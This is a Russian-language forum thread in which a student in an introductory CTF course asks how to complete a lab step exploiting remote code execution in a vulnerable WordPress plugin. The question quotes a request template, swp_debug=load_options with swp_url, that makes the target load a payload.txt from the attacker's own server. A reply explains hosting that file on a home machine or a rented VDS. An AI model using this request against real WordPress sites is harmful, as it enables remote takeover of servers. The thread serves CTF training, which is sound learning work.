ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Веб-уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   Прохождение курса Введение в CTF (https://forum.antichat.xyz/showthread.php?t=591125)

Lastweek 07.11.2025 18:53
Всем доброго времени суток!
Проходя курс Введение в CTF столкнулся с проблемой
В Разделе 6 - Эксплуатируем RCE в уязвимом плагине WordPress
Согласно инструкции теперь нам нужно посетить следующую страницу - http://уязвимый_сервер/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://сервер_где_расположен_наш_ф айл/payload.txt:
  1. Указываем уязвимый сервер, не забывая про порт 18500.
  2. Указываем IP-адрес или домен нашего VDS, а также порт, который мы написали в команде с python3
Как найти "http://сервер_где_расположен_наш_ф айл/" ?
Что значит "Указываем IP-адрес или домен нашего VDS, а также порт, который мы написали в команде с python3"?

Lunik 10.11.2025 15:09
Цитата:

Lastweek сказал(а):

Всем доброго времени суток!
Проходя курс Введение в CTF столкнулся с проблемой
В Разделе 6 - Эксплуатируем RCE в уязвимом плагине WordPress
Согласно инструкции теперь нам нужно посетить следующую страницу - http://уязвимый_сервер/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://сервер_где_расположен_наш_ф айл/payload.txt:
  1. Указываем уязвимый сервер, не забывая про порт 18500.
  2. Указываем IP-адрес или домен нашего VDS, а также порт, который мы написали в команде с python3
Как найти "http://сервер_где_расположен_наш_ф айл/" ?
Что значит "Указываем IP-адрес или домен нашего VDS, а также порт, который мы написали в команде с python3"?
Добрый день! Это значит вам нужно развернуть свои Web Сервер или воспользоваться готовым если у вас его нет. Развернуть вы его можете как у себя на домашнем ПК, не забыв настроить NAT (пробросить порты на роутере домашнем) или арендовать сервер VDS и там поднять Web Сервер


Время: 23:40